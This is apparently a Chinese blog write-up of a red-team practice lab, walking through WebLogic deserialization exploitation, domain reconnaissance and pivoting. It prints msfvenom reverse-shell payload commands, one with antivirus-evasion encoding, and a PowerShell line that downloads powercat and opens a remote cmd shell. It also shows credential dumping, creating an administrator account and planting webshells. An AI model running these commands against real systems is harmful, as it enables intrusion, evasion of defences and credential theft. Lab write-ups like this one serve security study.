红日靶场二

描述：

红队实战系列，主要以真实企业环境为实例搭建一系列靶场，通过练习、视频教程、博客三位一体学习。本次红队环境主要Access
Token利用、WMI利用、域漏洞利用SMB relay，EWS
relay，PTT(PTC)，MS14-068，GPP，SPN利用、黄金票据/白银票据/Sid
History/MOF等攻防技术。关于靶场统一登录密码：1qaz@WSX

1. Bypass UAC

2. Windows系统NTLM获取（理论知识：Windows认证）

3. Access Token利用（MSSQL利用）

4. WMI利用

5. 网页代理，二层代理，特殊协议代理（DNS，ICMP）

6. 域内信息收集

7. 域漏洞利用：SMB relay，EWS relay，PTT(PTC)，MS14-068，GPP，SPN利用

8. 域凭证收集

9. 后门技术（黄金票据/白银票据/Sid History/MOF）

环境说明

内网网段：10.10.10.1/24

DMZ网段：192.168.111.1/24

测试机地址：192.168.111.1（Windows），192.168.111.11（Linux）

防火墙策略（策略设置过后，测试机只能访问192段地址，模拟公网访问）：

deny all tcp ports：10.10.10.1

allow all tcp ports：10.10.10.0/24

配置信息

DC

IP：10.10.10.10OS：Windows 2012(64)

应用：AD域

WEB

IP1：10.10.10.80IP2：192.168.111.80OS：Windows 2008(64)

应用：Weblogic 10.3.6MSSQL 2008

PC

IP1：10.10.10.201IP2：192.168.111.201OS：Windows 7(32)

1. 对拿到的IP地址扫描看看有没有什么利用的信息，分析思路

**┌──(root💀kali)-[/]**

**└─\# nmap -sS -sV 192.168.111.80**

**Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-29 09:31 CST**

**Nmap scan report for 192.168.111.80**

**Host is up (0.00034s latency).**

**Not shown: 989 filtered ports**

**PORT STATE SERVICE VERSION**

**80/tcp open http Microsoft IIS httpd 7.5**

**135/tcp open msrpc Microsoft Windows RPC**

**139/tcp open netbios-ssn Microsoft Windows netbios-ssn**

**445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012
microsoft-ds**

**1433/tcp open ms-sql-s Microsoft SQL Server 2008 R2 10.50.4000; SP2**

**3389/tcp open ms-wbt-server?**

**7001/tcp open http Oracle WebLogic Server 10.3.6.0 (Servlet 2.5; JSP 2.1;
T3 enabled)**

**49152/tcp open msrpc Microsoft Windows RPC**

**49153/tcp open msrpc Microsoft Windows RPC**

**49154/tcp open msrpc Microsoft Windows RPC**

**49155/tcp open msrpc Microsoft Windows RPC**

**MAC Address: 00:0C:29:68:D3:5F (VMware)**

**Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE:
cpe:/o:microsoft:windows**

**Service detection performed. Please report any incorrect results at
https://nmap.org/submit/ .**

**Nmap done: 1 IP address (1 host up) scanned in 104.22 seconds**

**Service detection performed. Please report any incorrect results at
https://nmap.org/submit/ .**

**Nmap done: 1 IP address (1 host up) scanned in 104.22 seconds**

2. 开了很多端口，直接访问80端口是个空白页面，7001收weblogc服务的端口号，3389也开了
   
   

3. 没发现可用信息，我们对80和7001来一波目录扫描收集有用信息

   这个是80端口出现的目录
   

   这个是7001端口出现的目录

**在**[**http://192.168.111.80:7001/console/login/LoginForm.jsp**](http://192.168.111.80:7001/console/login/LoginForm.jsp)**这个出发现了登录界面，用weblogc的默认密码试了试没有成功，爆破这里就不尝试了。**

**既然是weblogc的站我们上道具就完事了**

4. 用weblogc-master来扫描一波，下载和运行有问题的可以参考https://blog.csdn.net/qq_26947429/article/details/119208171?spm=1001.2014.3001.5501我的这一片文章

这边是爆出了一个weblogic has a JAVA deserialization
vulnerability:CVE-2019-2725，JAVA反序列化的漏洞，在msfconsole上面是由现成的exp的我们直接用

先使用exp然后再查看exp需要配置参数，后面是yes的就是必须要设置的

没有成功，查看了一下paayload都是uinux的所以不行很普通

再换了一个扫描weblogc的工具之后出现了更有用的东西

CVE-2017-3506和CVE-2019-2729的漏洞我门一个一个试

先试试CVE-2019-2729我们去下载一个poc，再做一下漏洞简介

漏洞简述

CVE-2019-2729漏洞是由于应用在处理反序列化输入信息时存在缺陷，攻击者可以通过发送精心构造的恶意
HTTP
请求，用于获得目标服务器的权限，并在未授权的情况下执行远程命令，最终获取服务器的权限。与CVE-2019-2725漏洞类似。

漏洞编号：CVE-2019-2725

影响版本：10.3.6.0、12.1.3.0、12.2.1.3

测试环境：Linux || vulhub || Weblogic 10.3.6.0

Poc的url：

https://github.com/ruthlezs/CVE-2019-2729-Exploit/blob/master/oracle-weblogic-deserialize.py

可以执行指令，乱码问题搞了半小时作为一个强迫症果断放弃了，有大佬解决了可以联系我哦！！！！

在试试CVE-2019-2729

漏洞利用前提

影响版本：10.3.6.0, 12.1.3.0, 12.2.1.0, 12.2.1.1 , 12.2.1.2

原理简析

漏洞触发位置：wls-wsat.war

漏洞触发URL：/wls-wsat/CoordinatorPortType（POST）

漏洞的本质：构造SOAP（XML）格式的请求，在解析的过程中导致XMLDecoder反序列化漏洞

很难受莫得poc只能手动操作了

访问/wls-wsat/CoordinatorPortType11目录，存在下图则说明或许存在漏洞

攻击者服务器搭建一个http服务器,并在web目录下放一个msf生成的马子
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.111.128
LPORT=5555 -f exe -o /home/dzj/ff.exe

注意用python搭建简易的http服务不同的·python版本指令不一样

python2语法：python -m SimpleHTTPServer

python3语法：python -m http.server

这个httpserver的目录在那个目录下打开就是那个目录

先打开msf的监听

我们来构造payload

访问http://192.168.111.80:7001/wls-wsat/CoordinatorPortType11,利用burp抓包,修改请求为post,content-type为text/xml,构造xml数据并发送,传了半天开了上帝视角才发现web服务器没curl指令麻了

换思路通过powershell反弹shell了，先试试xml代码有没有问题，可以打开计算器说明莫得问题啦

然后就是找个反弹shell的代码了

Powershell IEX (New-Object
System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1');
powercat -c 192.168.111.80 -p 9909 -e cmd

等了半天没上线，打开靶机一看，扑该！

网上找了个CVE-2019-2725的poc，里面有个规定编码方式的要删除不然可能会运行失败

简简单单测试一下poc的功能，可以执行指令，我们通过poc自带的上传shell的工具直接传shell

这边我感觉可以改一下poc里面的shell修改个大马不美滋滋，我门直接添加用户并且加入管理员关闭防火墙开启3389

添加用户 net user test Admin123 /add被360拦截了，扑该！

直接上道具了，上传了冰蝎马子连接到冰蝎

这了上传msf的马子在前面生成的连接到msfconsole，我们生成的马子被360无情拦截，搞了半天静态免杀了不过用冰蝎远程执行就被拦截了，又得搞动态免杀

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.111.128 LPORT=5555 -e
x86/shikata_ga_nai -x /home/dzj/npp.7.8.9.Installer.exe -i 12 -f exe -o
/home/dzj/test.exe

扑该啊，我直接在服务器双击了，动态免杀搞不懂

进程迁移加载kiwi获取密码用户名

开启3389端口远程桌面走起来，360拦截了异常行为

执行失败才想起来3389开着，上才艺！！！

很舒服了，还是一个域管理员的用户，先来域信息收集

C:\Windows\system32>chcp 65001乱码解决（这个是在msfconsole里面用的）

**net config workstation 查看是否有域，以及当前登录域**

**net view 查看域内主机列表**

**net group "domain controllers" /domain 查看域控制器(如果有多台)**

**net user /domain 查看域内所有域用户**

**net group "domain admins" /domain 查看域管理员列表**

**然后通过ping 命令查看域中主机的ip**

这个失败了，通过ping拿到域内计算机ip也就不行了

都用不了！！！

1. 添加路由来实现对内网主机的扫描

扫描10.10.10.0/24网段的存活主机

第一遍扫描只有两个地址，第二遍就行了，不懂啥原因

可以看出来有DC、WEB、PC三个主机，对这DC、PC主机端口扫描，先做一个socks代理,这个扫描太慢了，还不如给web服务器传一个nmap直接起飞

用nmap对内网主机扫描

proxychains nmap -sT -Pn 10.10.10.10

proxychains nmap -sT -Pn 10.10.10.201

图左10.10.10.10 图右10.10.10.201

都开了445可以测试一波有没有

不出意外都有，这里没啥好说的看我上一篇文章有对这个的详细利用

https://blog.csdn.net/qq_26947429/article/details/119103355?spm=1001.2014.3001.5501

这边拿下域控之后，获取密码用户名直接登录win7即可。